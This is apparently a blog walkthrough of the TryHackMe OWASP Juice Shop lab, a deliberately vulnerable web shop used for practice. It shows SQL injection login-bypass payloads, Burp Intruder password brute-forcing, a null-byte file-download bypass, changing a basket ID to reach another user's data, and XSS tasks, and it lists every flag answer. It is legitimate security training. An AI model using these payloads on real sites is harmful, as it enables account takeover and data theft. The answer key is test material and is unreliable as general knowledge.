In this article I go through the OWASP Juice Shop room of tryhackme.com. This room is a practical review of the OWASP Top 10 vulnerabilities. This is a base security consideration for those who want to develop web applications.
Task 1 Open for business!
In the first task we have to start the attached virtual machine and read the rules of the room. There are no questions to answer.
Task 2 Let’s go on adventure!
Let’s look around in the web application, investigate the links and the text data it shares with us. It is called walk through.
Question #1: What’s the Administrator’s email address?
The Apple Juice product page shows us the email address.
Answer #1: admin@juice-sh.op
Question #2: What parameter is used for searching?
When we write something in the search bar and hit Enter the URL of the page will show the search parameter.
Answer #2: q
Question #3: What show does Jim reference in his review?
In Jim’s review we can read “Fresh out of a replicator.”, but what is a replicator? Let’s search for it! The first results will show us the series that is referenced. It’s Star Trek. We can answer now.
Answer #3: Star Trek
Task 3 Inject the juice
We focus on the injection vulnerabilities here. Read the task very carefully!
Open the attached VM’s IP address in the browser and start the Burp Suite.
Navigate to the Account / Login page.
In Burp turn on the Intercept and back to the browser set FoxyProxy to use the Burp Suit proxy.
Try to log in with some data and investigate the proxy interception in Burp.
{"email":"abc@def.com","password":"123and4"}In the next round we have to change the data to return an always true value. 1=1 is always true.
{"email":"abc@def.com' or 1=1--","password":"123and4"}After forwarding the request we can answer the first question. (The double dash “–” is commenting out the rest of the data in the SQL language.)
Question #1: Log into the administrator account!
Answer #1: 32a5e0f21372bcc1000a6088b93b458e41f0e02a
We can continue.
Question #2: Log into the Bender account!
It is similar to question #1, but the tasks says that we have to use the bender@juice-sh.op this time.
{"email":"bender@juice-sh.op","password":"123and4"}We will inject another true value:
{"email":"bender@juice-sh.op'--","password":"123and4"}When we forward the request the answer will appear on the screen.
Answer #2: fb364762a3c102b2db932069c0e6b78e738d4066
We don’t use 1=1 because we know the exact email address in this exercise. The valid email address will return true, so we don’t have to force out another true value. The double dash will stop processing the rest of the query in the SQL language.
Task 4 Who broke my lock?!
In this task we investigate some authentication flaws.
Question #1: Bruteforce the Administrator account’s password!
Sure thing! Weak passwords are easy to brute force. Let’s fire up our Burp Suite again and start an attack.
Capture the login request again with the Burp Proxy.
Send the login request to the Intruder module with Ctrl + I. (Or right click and use the menu.)
Clear the § symbols with the Clear § button on the right.
Edit the login request to substitute the password value in a Sniper bruteforce attack.
{"email":"admin@juice-sh.op","password":"§§"}Extract and use the usr/share/wordlists/SecLists/Passwords/Common-Credentials/best1050.txt file and start the attack. Look for the 200 status for successful login. We find the password for the admin user (admin123). Now we can log in and answer the question.
Answer #1: c2110d06dc6f81c67cd8099ff0ba601241f1ac0e
Let’s continue with the next question!
Question #2: Reset Jim’s password!
Read the text and follow the instructions. The answer can be found with it.
Answer #2: 094fbc9b48e525150ba97d05b942bbf114987257
Task 5 AH, don’t look!
This task is about exposing sensitive information to the public.
Question #1: Access the Confidential Document!
After checking the About us page there is a link that shows us the ftp/ directory on the server. We simply open it in the browser.
We download the acquisitions.md file and navigate back to the home page. The answer will wait for us there.
Answer #1: edf9281222395a1c5fee9b89e32175f1ccf50c5b
Question #2: Log into MC SafeSearch’s account!
Follow the instructions and the answer will be easy to find.
Answer #2: 66bdcffad9e698fd534003fbb3cc7e2b7b55d7f0
Question #3: Download the Backup file!
Here we have to follow the instructions again. The file of our interest is the package.json.bak. We cannot download it at first. Let’s do the Poison NULL Byte character bypass! It is the %00 with url encoding: %2500 and adding the .md extension to the end.
Answer #3: bfc1e6b4a16579e85e06fee4c36ff8c02fb13795
Task 6 Who’s flying this thing?
Question #1: Access the administration page!
We have to follow the instructions to find the admin area.
Then we have to log in with the admin user and credentials we have already found.
When we navigate to the admin area the answer will appear.
Answer #1: 946a799363226a24822008503f5d1324536629a0
Question #2: View another user’s shopping basket!
We stay logged in with the admin account.
Let’s fire up the Burp Suite.
Check the basket (Your Basket) and intercept the connection.
We will see the GET request like this.
GET /rest/basket/1 HTTP/1.1Let’s change the request for the next user account!
GET /rest/basket/2 HTTP/1.1Answer #2: 41b997a36cc33fbe4f0ba018474e19ae5ce52121
Question #3: Remove all 5-star reviews!
We can do that in the admin area.
Answer #3: 50c97bcce0b895e446d61c83a21df371ac2266ef
Task 7 Where did that come from?
We will learn some XSS (Cross Site Scripting) in this task.
Question #1: Perform a DOM XSS!
If we follow the instructions then we create an <iframe> HTML element that runs a JavaScript alert.
Answer #1: 9aaf4bbea5c30d00a1f5bbcfce4db6d4b0efe0bf
Question #2: Perform a persistent XSS!
Log in as admin again.
Navigate to the Account / Privacy & Security / Last Login IP.
Intercept the log out with Burp Suite.
Follow the instructions and extend the headers.
Log in again and see the answer.
Answer #2: 149aa8ce13d7a4a8a931472308e269c94dc5f156
Question #3: Perform a reflected XSS!
The ID parameter is not sanitized in the web application so we can follow the instructions and do a reflected XSS attack.
Answer #3: 23cefee1527bde039295b2616eeb29e1edc660a0
Task 8 Exploration!
We just navigate the the provided URL and look around. When we return to the home page the answer will be displayed.
Answer: 7efd3174f9dd5baa03a7882027f2824d2f72d86e
Tom's IT Cafe 
Good job
LikeLiked by 1 person